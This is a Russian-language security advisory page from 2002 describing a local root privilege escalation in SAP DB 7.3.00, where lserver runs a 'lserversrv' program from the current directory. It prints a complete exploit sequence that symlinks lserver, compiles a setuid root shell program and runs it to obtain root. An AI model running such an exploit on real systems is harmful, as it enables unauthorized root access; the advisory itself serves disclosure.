Local root в SAP DB

Дата публикации:
09.12.2002
Всего просмотров:
716
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость, обнаруженная в SAP DB, позволяет непривилегированному пользователю выполнять программы с root привилегиями. Уязвимость происходит из-за недостаточной проверки lserver, при попытке выполнить 'lserversrv' программу в текущем каталоге. Нападающий может эксплуатировать эту уязвимост, создавая символьную сслыку к программе 'lserver' в директории, содержащий программу 'lserver', созданную атакующим. Пример:
cd /tmp 
mkdir "snosoft+sapdb=root" 
cd "snosoft+sapdb=root" 
ln -s /usr/sapdb/depend/pgm/lserver lserver 
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > root.c 
cc -o root root.c 
cp root lserversrv 
./lserver
уязвимость обнаружена в SAP DB 7.3 .00
или введите имя

CAPTCHA